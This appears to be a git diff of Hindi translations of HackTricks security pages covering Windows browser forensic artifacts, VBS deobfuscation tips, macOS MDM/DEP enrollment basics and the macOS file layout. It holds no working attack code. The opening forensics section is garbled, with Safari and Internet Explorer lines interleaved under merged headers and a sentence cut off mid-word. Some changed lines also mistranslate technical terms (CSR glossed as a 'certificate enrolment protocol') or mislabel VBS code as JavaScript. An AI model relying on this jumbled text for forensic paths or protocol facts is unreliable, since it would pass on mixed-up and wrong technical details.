* URL: यूआरएल मूल - **कैश**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
* CreationTime: पहली बार जब यह कैश किया गया था - **अंतिम सक्रिय सत्र**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
* AccessedTime: कैश का उपयोग किया गया समय
* ModifiedTime: अंतिम वेबपेज संस्करण
* ExpiryTime: कैश का समय जब समाप्त होगा
#### फ़ाइलें ## Safari
कैश जानकारी _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ और _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ में पाई जा सकती है। Safari डेटा `/Users/$User/Library/Safari` में संग्रहित होता है। मुख्य फ़ाइलें शामिल हैं:
इन फ़ोल्डरों के अंदर की जानकारी उपयोगकर्ता द्वारा देखा जा रहा था। कैश का आकार **250 MB** होता है और टाइमस्टैम्प दिखाता है कि पृष्ठ कब देखा गया था (पहली बार, NTFS के निर्माण तिथि, अंतिम समय, NTFS के संशोधन समय)। - **History.db**: URL और यात्रा समय चिह्नित करने वाले `history_vis
### कुकीज़
आप टूल [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) का उपयोग कुकीज़ की जांच करने के लिए कर सकते हैं। आपको उस फ़ोल्डर की स्थान दर्शाना होगा जहाँ आपने कुकीज़ निकाली हैं।
#### **मेटाडेटा**
कुकीज़ के बारे में मेटाडेटा जानकारी सहेजता है:
* फ़ाइल सिस्टम में कुकीज़ का नाम
* URL
* AccessCount: कितनी बार कुकीज़ सर्वर को भेजी गई है
* CreationTime: पहली बार कुकीज़ बनाई गई थी
* ModifiedTime: अंतिम बार कुकीज़ को संशोधित किया गया था
* AccessedTime: कुकीज़ को अंतिम बार एक्सेस किया गया था
* ExpiryTime: कुकीज़ की समाप्ति का समय
#### फ़ाइलें
कुकीज़ डेटा _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ और _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ में पाई जा सकती है।
सत्र कुकीज़ मेमोरी में रहेंगी और स्थायी कुकी डिस्क में।
### डाउनलोड
#### **मेटाडेटा**
उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) की ज

View file

@ -8,27 +8,27 @@
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके * **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं: कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
## echo ## echo
```bash ```bash
Wscript.Echo "Like this?" Wscript.Echo "Like this?"
``` ```
## टिप्पणियाँ ## टिप्पणियाँ
```text ```bas
' this is a comment ' this is a comment
``` ```
## परीक्षण ## परीक्षण
```text ```bas
cscript.exe file.vbs cscript.exe file.vbs
``` ```
## फ़ाइल में डेटा लिखें ## फ़ाइल में डेटा लिखें
```aspnet ```js
Function writeBinary(strBinary, strPath) Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")

View file

@ -2,66 +2,75 @@
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** ट्विटर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का** **पालन** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके * **HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें
</details> </details>
## मूल बातें **macOS MDM के बारे में जानने के लिए:**
### MDM (Mobile Device Management) क्या है? * [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) एक प्रौद्योगिकी है जो आमतौर पर मोबाइल फोन, लैपटॉप, डेस्कटॉप और टैबलेट जैसे अंतिम-उपयोगकर्ता कंप्यूटिंग उपकरणों को **प्रशासित करने** के लिए उपयोग की जाती है। iOS, macOS और tvOS जैसे Apple प्लेटफॉर्म के मामले में, यह उन विशेषताओं, APIs और तकनीकों का उल्लेख करता है जिनका उपयोग प्रशासक इन उपकरणों को प्रबंधित करने के लिए करते हैं। उपकरणों का प्रबंधन MDM के माध्यम से एक संगत वाणिज्यिक या ओपन-सोर्स MDM सर्वर की आवश्यकता होती है जो [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) के लिए समर्थन को लागू करता है। ## मूलभूत
* **केंद्रीकृत उपकरण प्रबंधन** प्राप्त करने का एक तरीका ### **MDM (मोबाइल डिवाइस प्रबंधन) अवलोकन**
* **MDM सर्वर** की आवश्यकता होती है जो MDM प्रोटोकॉल के लिए समर्थन को लागू करता है [मोबाइल डिवाइस प्रबंधन](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) का उपयोग स्मार्टफोन, लैपटॉप और टैबलेट जैसे विभिन्न अंतयज उपकरणों का प्रबंधन करने के लिए किया जाता है। विशेष रूप से Apple के प्लेटफॉर्मों (iOS, macOS, tvOS) के लिए, इसमें विशेषताएँ, एपीआई और अभ्यास शामिल हैं। MDM का संचालन एक संगत MDM सर्वर पर निर्भर करता है, जो व्यापार में उपलब्ध या ओपन-सोर्स हो सकता है, और [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) का समर्थन करना चाहिए। मुख्य बिंदुओं में शामिल हैं:
* MDM सर्वर **MDM आदेश भेज सकता है**, जैसे कि दूरस्थ पोंछ या "इस कॉन्फ़िग को स्थापित करें"
### मूल बातें DEP (Device Enrolment Program) क्या है? - उपकरणों पर केंद्रीकृत नियंत्रण।
- MDM प्रोटोकॉल का पालन करने वाले MDM सर्वर पर निर्भरता।
- MDM सर्वर की क्षमता विभिन्न कमांडों को उपकरणों में भेजने के लिए, उदाहरण के लिए, दूरस्थ डेटा मिटाना या विन्यास स्थापना।
[Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) Apple द्वारा प्रदान की गई एक सेवा है जो iOS, macOS, और tvOS उपकरणों के **शून्य-स्पर्श विन्यास** की पेशकश करके Mobile Device Management (MDM) **नामांकन** को **सरलीकृत** करती है। अधिक पारंपरिक तैनाती विधियों के विपरीत, जिनके लिए अंतिम-उपयोगकर्ता या प्रशासक को एक उपकरण को कॉन्फ़िगर करने के लिए कार्रवाई करनी पड़ती है, या मैन्युअल रूप से एक MDM सर्वर के साथ नामांकन करना पड़ता है, DEP इस प्रक्रिया को बूटस्ट्रैप करने का लक्ष्य रखता है, **उपयोगकर्ता को एक नए Apple उपकरण को अनबॉक्स करने और इसे संगठन में उपयोग के लिए लगभग तुरंत कॉन्फ़िगर किया जा सकता है** ### **DEP (डिवाइस एनरोलमेंट प्रोग्राम) की मूलभूत जानकारी**
Apple द्वारा प्रदान किया गया [डिवाइस एनरोलमेंट प्रोग्राम](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) iOS, macOS और tvOS उपकरणों के लिए जीर्ण-स्पर्श विन्यास को सुगम बनाता है, जिससे MDM का सम्मिलन सुविधाजनक होता है। DEP एनरोलमेंट प्रक्रिया को स्वचालित करता है, जिससे उपकरणों को बॉक्स से निकालते ही संचालनिक रूप से सक्रिय किया जा सकता है, न्यूनतम उपयोगकर्ता या प्रशासनिक हस्तक्षेप के साथ। महत्वपूर्ण पहलू शामिल हैं:
प्रशासक DEP का उपयोग अपने संगठन के MDM सर्वर में उपकरणों को स्वचालित रूप से नामांकित करने के लिए कर सकते हैं। एक बार उपकरण नामांकित हो जाने के बाद, **कई मामलों में इसे संगठन द्वारा स्वामित्व वाले "विश्वसनीय"** उपकरण के रूप में माना जाता है, और यह कई प्रमाणपत्र, अनुप्रयोग, वाईफाई पासवर्ड, VPN कॉन्फ़िगरेशन [और इसी तरह](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf) प्राप्त कर सकता है। - उपकरणों को प्रारंभिक सक्रियण के बाद पूर्व-निर्धारित MDM सर्वर के साथ स्वत: पंजीकरण करने की संभावना।
- मुख्य रूप से नए उपकरणों के लिए उपयोगी है, लेकिन पुनर्विन्यास के अवसरों के लिए भी लागू है।
- एक सरल सेटअप को सुविधाजनक बनाता है, जिससे उपकरण त्वरित रूप से संगठनात्मक उपयोग के लिए तैयार हो जाते हैं।
* उपकरण को पहली बार चालू करने पर पूर्व-कॉन्फ़िगर किए गए MDM सर्वर में स्वचालित रूप से नामांकित करने की अनुमति देता है ### **सुरक्षा विचार**
* सबसे उपयोगी जब **उपकरण** **बिल्कुल नया** हो DEP द्वारा प्रदान की गई पंजीकरण की सरलता का ध्यान रखना महत्वपूर्ण है, जो लाभकारी होने के साथ-साथ सुरक्षा जोखिम भी उठा सकती है। यदि MDM पंजीकरण के लिए उचित संरक्षण उपयुक्त रूप से प्रयोग नहीं किए जाते हैं, तो हमलावर इस सुविधाजनक प्रक्रिया का उपयोग करके अपने उपकरण को संगठन के MDM सर्वर पर पंजीकृत कर सकते हैं, कॉर्पोरेट उपकरण के रूप में बनामास्कार करते हुए।
* **पुनः प्रावधान** कार्यप्रवाहों के लिए भी उपयोगी हो सकता है (**ताजा OS स्थापना के साथ** **पोंछा** गया)
{% hint style="danger" %} {% hint style="danger" %}
दुर्भाग्यवश, यदि किसी संगठन ने अपने MDM नामांकन की **सुरक्षा के लिए अतिरिक्त कदम नहीं उठाए हैं**, तो DEP के माध्यम से एक सरलीकृत अंतिम-उपयोगकर्ता नामांकन प्रक्रिया का मतलब यह भी हो सकता है कि **हमलावरों के लिए संगठन के MDM** सर्वर में एक उपकरण को नामांकित करने की प्रक्रिया सरल हो जाए, एक कॉर्पोरेट उपकरण की "पहचान" का दावा करते हुए **सुरक्षा चेतावनी**: सरल DEP पंजीकरण के माध्यम से अनधिकृत उपकरण पंजीकरण को संगठन के MDM सर्वर पर पंजीकृत करने की संभावना है यदि उचित सुरक्षा उपाय स्थापित नहीं किए गए हों
{% endhint %} {% endhint %}
### मूल बातें SCEP (Simple Certificate Enrolment Protocol) क्या है? ### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
* एक अपेक्षाकृत पुराना प्रोटोकॉल, TLS और HTTPS व्यापक रूप से प्रचलित होने से पहले बनाया गया। * एक उत्कृष्ट प्रोटोकॉल, TLS और HTTPS के फैलने से पहले बनाया गया।
* ग्राहकों को एक प्रमाणपत्र प्राप्त करने के उद्देश्य से एक **Certificate Signing Request** (CSR) भेजने का एक मानकीकृत तरीका देता है। ग्राहक सर्वर से उसे एक हस्ताक्षरित प्रमाणपत्र देने के लिए कहेगा। * ग्राहकों को प्रमाणपत्र प्राप्त करने के लिए **सरल प्रमाणपत्र पंजीकरण अनुप्रोटोल** (CSR) भेजने का एक मानकीकृत तरीका। ग्राहक सर्वर से एक साइन किया गया प्रमाणपत्र प्राप्त करने के लिए सर्वर से कहेगा।
### कॉन्फ़िगरेशन प्रोफाइल (उर्फ mobileconfigs) क्या हैं? ### What are Configuration Profiles (aka mobileconfigs)?
* Apple का आधिकारिक तरीका **सिस्टम कॉन्फ़िगरेशन सेटिंग/प्रवर्तन करने का।** * Apple का आधिकारिक तरीका **सिस्टम विन्यास सेट/निषेधन** करने का।
* फ़ाइल प्रारूप जो कई पेलोड्स को समाहित कर सकता है * फाइल प्रारूप जिसमें कई payloads हो सकते हैं
* प्रॉपर्टी लिस्ट्स (XML प्रकार) पर आधारित * संपत्ति सूचियों पर आधारित (एक्सएमएल प्रकार का)
* “हस्ताक्षरित और एन्क्रिप्टेड किया जा सकता है उनके मूल, अखंडता को मान्य करने और उनकी सामग्री की सुरक्षा के लिए।” मूल बातें — पृष्ठ 70, iOS सुरक्षा गाइड, जनवरी 2018। * "उनकी मूल की पुष्टि करने, उनकी पूर्णता सुनिश्चित करने और उनकी सामग्री की सुरक्षा करने के लिए साइन और एन्क्रिप्ट किया जा सकता है।" मूलभूत — पृष्ठ 70, iOS सुरक्षा गाइड, जनवरी 2018।
## प्रोटोकॉल ## Protocols
### MDM ### MDM
* APNs (**Apple सर्वर**s) + RESTful API (**MDM** **विक्रेता** सर्वर) का संयोजन * APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers) का संयोजन
* **संचार** एक **उपकरण** और एक सर्वर के बीच होता है जो एक **उपकरण** **प्रबंधन** **उत्पाद** से जुड़ा होता है * **संचार** एक **उपकरण** और एक **उपकरण प्रबंधन** **उत्पाद** से संबंधित सर्वर के बीच होता है
* **आदेश** MDM से उपकरण में **plist-encoded शब्दकोशों** में वितरित किए जाते है * **कमांड** MDM से उपकरण में पहुंचाए जाते हैं **plist-encoded dictionaries** मे
* सभी **HTTPS** के ऊपर। MDM सर्वर हो सकते हैं (और आमतौर पर होते हैं) पिन किए गए * सभी **HTTPS** के माध्यम से। MDM सर्वरों को (और आम तौर पर) पिन किया जा सकता है
* Apple MDM विक्रेता को प्रमाणीकरण के लिए एक **APNs प्रमाणपत्र** प्रदान करता है * Apple MDM विक्रेता को प्रमाणीकरण के लिए एक **APNs प्रमाणपत्र** प्रदान करता है
### DEP ### DEP
* **3 APIs**: 1 रिसेलर्स के लिए, 1 MDM विक्रेताओं के लिए, 1 उपकरण पहचान के लिए (अप्रलेखित): * **3 APIs**: 1 रिसेलरों के लिए, 1 MDM विक्रेताओं के लिए, 1 डिवाइस पहचान के लिए (अनसंदर्भित):
* तथाकथित [DEP "क्लाउड सेवा" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)। इसका उपयोग MDM सर्वर द्वारा विशिष्ट उपकरणों के साथ DEP प्रोफाइलों को जोड़ने के लिए किया जाता है। * उसे [DEP "बादल सेवा" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) कहा जाता है। इसका उपयोग MDM सर्वरों द्वारा DEP प्रोफाइलों को विशिष्ट उपकरणों के साथ संबंधित करने के लिए किया जाता है।
* [DEP API जिसका उपयोग Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) द्वारा उपकरणों को नामांकित करने, नामांकन स्थिति की जांच करने और लेनदेन स्थिति की जांच करने के लिए किया ज * [एप्पल अधिकृत रिसेलरों द्वारा उपयोग किया जाने वाला DEP API](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) उपकरणों को नामांकित करने, नामांकन स्थिति की जांच करने और लेन-देन स्थिति की जांच करने के लिए।
* अनसंदर्भित निजी DEP API। इसका उपयोग एप्पल उपकरणों द्वारा उनके DEP प्रोफाइल का अनुरोध करने के लिए किया जाता है। macOS पर, `cloudconfigurationd` बाइनरी इस API के साथ संवाद करने के लिए जिम्मेदार है।
* अधिक आधुनिक और **JSON** आधारित (vs. plist)
* Apple MDM विक्रेता को एक **OAuth टोकन** प्रदान किया जाता है
**DEP "बाद

View file

@ -1,84 +1,83 @@
# macOS फाइल्स, फोल्डर्स, बाइनरीज़ और मेमोरी # macOS फ़ाइलें, फ़ोल्डर, बाइनरी और मेमोरी
<details> <details>
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहत हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**. * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** ट्विटर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का पालन करें।**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें. * **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें।
</details> </details>
## फाइल हायरार्की लेआउट ## फ़ाइल व्यवस्था लेआउट
* **/Applications**: इंस्टॉल किए गए ऐप्स यहाँ होने चाहिए। सभी यूजर्स इन्हें एक्सेस कर सकेंगे। * **/Applications**: स्थापित ऐप्स यहाँ होने चाहिए। सभी उपयोगकर्ता उन्हें एक्सेस कर सकेंगे।
* **/bin**: कमांड लाइन बाइनरीज़ * **/bin**: कमांड लाइन बाइनरी
* **/cores**: अगर मौजूद है, तो यह कोर डंप्स स्टोर करने के लिए इस्तेमाल होता है * **/cores**: अगर मौजूद है, तो यह कोर डंप स्टोर करने के लिए उपयोग किया जाता है
* **/dev**: सब कुछ फाइल के रूप में माना जाता है इसलिए आपको हार्डवेयर डिवाइसेस यहाँ स्टोर होते दिख सकते हैं। * **/dev**: सब कुछ एक फ़ाइल के रूप में देखा जाता है इसलिए आप हार्डवेयर डिवाइस यहाँ स्टोर किए गए देख सकते हैं।
* **/etc**: कॉन्फ़िगरेशन फाइल्स * **/etc**: कॉन्फ़िगरेशन फ़ाइलें
* **/Library**: यहाँ बहुत सारी सबडायरेक्टरीज़ और फाइल्स प्रेफरेंसेस, कैशेस और लॉग्स से संबंधित मिल सकती हैं। एक Library फोल्डर रूट में और प्रत्येक यूजर की डायरेक्टरी में मौजूद होता है। * **/Library**: यहाँ प्राथमिकताएँ, कैश और लॉग्स से संबंधित कई उपनिर्देशिकाएँ और फ़ाइलें पाई जा सकती हैं। एक लाइब्रेरी फ़ोल्डर मूल और प्रत्येक उपयोगकर्ता के निर्देशिका में मौजूद है।
* **/private**: अनडॉक्यूमेंटेड लेकिन बहुत सारे उल्लेखित फोल्डर्स प्राइवेट डायरेक्टरी के सिम्बॉलिक लिंक्स होते हैं। * **/private**: अनसंदर्भित लेकिन उल्लिखित फ़ोल्डरों की बहुत सारी प्रतीकात्मक लिंक्स हैं जो निजी डायरेक्टरी के लिए हैं।
* **/sbin**: एसेंशियल सिस्टम बाइनरीज़ (प्रशासन से संबंधित) * **/sbin**: महत्वपूर्ण सिस्टम बाइनरी (प्रशासन से संबंधित)
* **/System**: OS X को चलाने के लिए फाइल। यहाँ ज्यादातर केवल Apple विशिष्ट फाइल्स मिलनी चाहिए (तीसरे पक्ष की नहीं)। * **/System**: OS X को चलाने के लिए फ़ाइल। आपको यहाँ अधिकांशत: केवल Apple विशिष्ट फ़ाइलें मिलेंगी (तीसरे पक्ष नहीं)।
* **/tmp**: फाइल्स 3 दिनों के बाद डिलीट हो जाती हैं (यह /private/tmp का सॉफ्ट लिंक है) * **/tmp**: फ़ाइलें 3 दिनों के बाद हटा दी जाती हैं (यह /private/tmp के लिए एक सॉफ़्ट लिंक है)
* **/Users**: यूजर्स के लिए होम डायरेक्टरी। * **/Users**: उपयोगकर्ताओं के लिए होम डायरेक्टरी।
* **/usr**: कॉन्फ़िग और सिस्टम बाइनरीज़ * **/usr**: कॉन्फ़िग और सिस्टम बाइनरी
* **/var**: लॉग फाइल्स * **/var**: लॉग फ़ाइलें
* **/Volumes**: माउंटेड ड्राइव्स यहाँ दिखाई देंगी। * **/Volumes**: माउंट की गई ड्राइव्स यहाँ दिखाई देंगी।
* **/.vol**: `stat a.txt` चलाने पर आपको कुछ ऐसा मिलता है `16777223 7545753 -rw-r--r-- 1 username wheel ...`हाँ पहला नंबर उस वॉल्यूम का आईडी नंबर होता है जहाँ फाइल मौजूद है और दूसरा इनोड नंबर होता है। आप इस जानकारी के साथ /.vol/ के माध्यम से इस फाइल की सामग्री तक पहुँच सकते हैं `cat /.vol/16777223/7545753` * **/.vol**: `stat a.txt` चलाने पर आपको `16777223 7545753 -rw-r--r-- 1 username wheel ...`ैसी कुछ प्राप्त होगी जहाँ पहला नंबर वह वॉल्यूम का आईडी नंबर है जहाँ फाइल मौजूद है और दूसरा इनोड नंबर है। आप इस फ़ाइल की सामग्री तक पहुंच सकते हैं /.vol/ के माध्यम से उस जानकारी के साथ चलाने `cat /.vol/16777223/7545753`
### एप्लिकेशन्स फोल्डर्स ### एप्लिकेशन फोल्डर
* **सिस्टम एप्लिकेशन्स** `/System/Applications` के अंतर्गत स्थित होते हैं। * **सिस्टम एप्लिकेशन** `/System/Applications` के तहत स्थित हैं
* **इंस्टॉल किए गए** एप्लिकेशन्स आमतौर पर `/Applications` या `~/Applications` में इंस्टॉल किए जाते हैं। * **स्थापित** एप्लिकेशन आम तौर पर `/Applications` या `~/Applications` में स्थापित होते हैं
* **एप्लिकेशन डेटा** रूट के रूप में चल रहे एप्लिकेशन्स के लिए `/Library/Application Support` में और यूजर के रूप में चल रहे एप्लिकेशन्स के लिए `~/Library/Application Support` में मिल सकता है। * **एप्लिकेशन डेटा** `/Library/Application Support` में पाया जा सकता है जो रूट के रूप में चल रहे एप्लिकेशनों के लिए है और `~/Library/Application Support` उपयोगकर्ता के रूप में चल रहे एप्लिकेशनों के लिए है।
* तीसरे पक्ष के एप्लिकेशन्स **daemons** जिन्हें **रूट के रूप में चलने की आवश्यकता होती है** आमतौर पर `/Library/PrivilegedHelperTools/` में स्थित होते हैं। * **संदर्भित** एप्स को `~/Library/Containers` फ़ोल्डर में मैप किया जाता है। प्रत्येक एप्लिकेशन के पास एक फ़ोल्डर होता है जिसका नाम एप्लिकेशन के बंडल ID के अनुसार होता है (`com.apple.Safari`)।
* **Sandboxed** एप्स `~/Library/Containers` फोल्डर में मैप किए जाते हैं। प्रत्येक एप्लिकेशन का एक फोल्डर होता है जो एप्लिकेशन के बंडल ID (`com.apple.Safari`) के अनुसार नामित होता है। * **कर्नेल** `/System/Library/Kernels/kernel` में स्थित है
* **कर्नेल** `/System/Library/Kernels/kernel` में स्थित होता है। * **Apple के कर्नेल एक्सटेंशन** `/System/Library/Extensions` में स्थित हैं
* **Apple के कर्नेल एक्सटेंशन्स** `/System/Library/Extensions` में स्थित होते हैं। * **तीसरे पक्ष कर्नेल एक्सटेंशन** `/Library/Extensions` में स्टोर किए जाते हैं
* **तीसरे पक्ष के कर्नेल एक्सटेंशन्स** `/Library/Extensions` में संग्रहीत होते हैं।
### संवेदनशील जानकारी वाली फाइल्स ### संवेदनशील जानकारी वाली फ़ाइलें
MacOS पासवर्ड्स जैसी जानकारी कई जगहों पर स्टोर करता है: MacOS जैसी जगहों पर पासवर्ड जैसी जानकारी स्टोर करता है:
{% content-ref url="macos-sensitive-locations.md" %} {% content-ref url="macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-sensitive-locations.md) [macos-sensitive-locations.md](macos-sensitive-locations.md)
{% endcontent-ref %} {% endcontent-ref %}
### कमजोर pkg इंस्टॉलर्स ### वंलरेबल pkg इंस्टॉलर्स
{% content-ref url="macos-installers-abuse.md" %} {% content-ref url="macos-installers-abuse.md" %}
[macos-installers-abuse.md](macos-installers-abuse.md) [macos-installers-abuse.md](macos-installers-abuse.md)
{% endcontent-ref %} {% endcontent-ref %}
## OS X विशिष्ट एक्सटेंशन्स ## OS X विशेष एक्सटेंशन्स
* **`.dmg`**: Apple Disk Image फाइल्स इंस्टॉलर्स के लिए बहुत आम हैं। * **`.dmg`**: Apple Disk Image फ़ाइलें इंस्टॉलर्स के लिए बहुत आम हैं।
* **`.kext`**: इसे विशिष्ट संरचना का पालन करना चाहिए और यह OS X का ड्राइवर संस्करण है। (यह एक बंडल है) * **`.kext`**: यह एक विशिष्ट संरचना का पालन करना चाहिए और यह ड्राइवर का OS X संस्करण है। (यह एक बंडल है)
* **`.plist`**: जिसे प्रॉपर्टी लिस्ट भी कहा जाता है, XML या बाइनरी प्रारूप में जानकारी स्टोर करता है। * **`.plist`**: XML या बाइनरी स्वरूप में जानकारी स्टोर करता है।
* XML या बाइनरी हो सकता है। बाइनरी वाले को पढ़ा जा सकता है: * XML या बाइनरी हो सकता है। बाइनरी वाले को इस प्रकार से पढ़ा जा सकता है:
* `defaults read config.plist` * `defaults read config.plist`
* `/usr/libexec/PlistBuddy -c print config.plsit` * `/usr/libexec/PlistBuddy -c print config.plsit`
* `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` * `plutil -p ~/Library/Preferences/com.apple.screensaver.plist`
* `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` * `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -`
* `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` * `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -`
* **`.app`**: Apple एप्लिकेशन्स जो डायरेक्टरी संरचना का पालन करते हैं (यह एक बंडल है)। * **`.app`**: एप्पल एप्लिकेशन जो डायरेक्टरी संरचना का पालन करते हैं (यह एक बंडल है)।
